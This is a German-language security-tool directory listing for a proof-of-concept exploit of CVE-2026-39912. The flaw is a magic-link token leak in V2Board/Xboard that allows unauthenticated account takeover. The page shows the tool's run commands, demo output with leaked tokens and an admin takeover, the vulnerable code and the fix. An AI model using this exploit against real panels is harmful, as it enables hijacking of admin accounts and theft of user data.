Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-39912 — Xboard / V2Board Nicht authentifizierte Kontoübernahme - Leak des Magic-Link-Tokens (CVE-2026-39912) | Kitploit
Tools/GitHubGitHub/chocapikk/cve-2026-39912
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsAuthentifizierung
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board Nicht authentifizierte Kontoübernahme - Leak des Magic-Link-Tokens (CVE-2026-39912)

Repository anzeigen
2vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2026-39912 - Xboard / V2Board: Kontoübernahme ohne Authentifizierung

Magic-Link-Token-Leak in loginWithMailLink

CVECVE-2026-39912
CVSS9.1 (Kritisch)
CWECWE-201 (Insertion of Sensitive Information Into Sent Data)
BetroffenV2Board >= 1.6.1 bis 1.7.4 / Xboard alle Versionen bis 0.1.9+
BehobenNoch nicht (V2Board seit Juni 2023 nicht mehr gepflegt)
Offengelegt2026-04-09
EntdeckerValentin Lobstein (Chocapikk)
Writeupchocapikk.com
Fix-PRsV2Board #981 / Xboard #873

TL;DR

Der loginWithMailLink-Endpunkt gibt den Magic-Login-Link direkt im HTTP-Antworttext zurück, anstatt ihn nur per E-Mail zu senden. Ein nicht authentifizierter Angreifer, der eine registrierte E-Mail-Adresse kennt, kann jedes Konto - einschließlich des Admin-Kontos - mit zwei HTTP-Anfragen übernehmen.

Betroffene Software

  • V2Board - Open-Source-Verwaltungspanel für Proxy-Protokolle (8,7k Sterne, nicht mehr gepflegt)
  • Xboard - Fork von V2Board (4k+ Sterne, aktiv gepflegt)

Beide sind weit verbreitete VPN-/Proxy-Panels, vor allem in China. ZoomEye zeigt über 7.000 im Internet exponierte Instanzen.

Voraussetzungen

  • login_with_mail_link_enable muss in den Admin-Einstellungen aktiviert sein (standardmäßig nicht aktiviert)
  • Eine gültige registrierte E-Mail-Adresse

Verwendung

root@kitploit:~
# Install dependencies
pip install requests

# Account takeover + data dump
python3 exploit.py http://target:7001 [email protected]

# Save dump to file
python3 exploit.py http://target:7001 [email protected] -o dump.json

Demo

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min from git clone to is_admin: true

[INFO] Requesting magic link for [email protected]
[INFO] Leaked: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Authenticated (admin=True)
[INFO] User Info: OK
[INFO] Subscription: OK
[INFO] Active Sessions: OK
[INFO] Stats: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

Der Bug

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // Token leaked to caller
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Same bug, inherited from fork

Der Fix

root@kitploit:~
- return [true, $link];
+ return [true, true];

Referenzen

  • V2Board - Verwundbarer Code (Zeile 71)
  • Xboard - Verwundbarer Code (Zeile 49)
  • Ursprünglicher Commit, der den Bug eingeführt hat (2022-06-27)
Tool herunterladen